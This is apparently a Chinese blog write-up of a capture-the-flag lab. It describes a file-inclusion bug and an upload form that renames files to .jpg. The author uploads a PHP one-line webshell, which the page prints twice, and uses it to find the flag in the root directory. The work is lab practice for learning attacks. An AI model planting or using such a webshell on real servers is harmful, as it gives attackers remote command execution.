目录
2、上传界面可以上传任意文件,但上传后系统把文件名都改为xxx.jpg。
1、访问靶机发现存在文件包含。
2、上传界面可以上传任意文件,但上传后系统把文件名都改为xxx.jpg。
3、尝试上传PHP一句话木马cmd.php
<?php
@eval($_POST['cmd']);
?>
4、连接一句话木马,在根目录找到flag,


博主发现靶机存在文件包含漏洞,通过上传PHP木马成功执行命令。上传文件功能限制了文件名,但不影响攻击。最终在根目录找到flag。
目录
2、上传界面可以上传任意文件,但上传后系统把文件名都改为xxx.jpg。
<?php
@eval($_POST['cmd']);
?>


383
1080

被折叠的 条评论
为什么被折叠?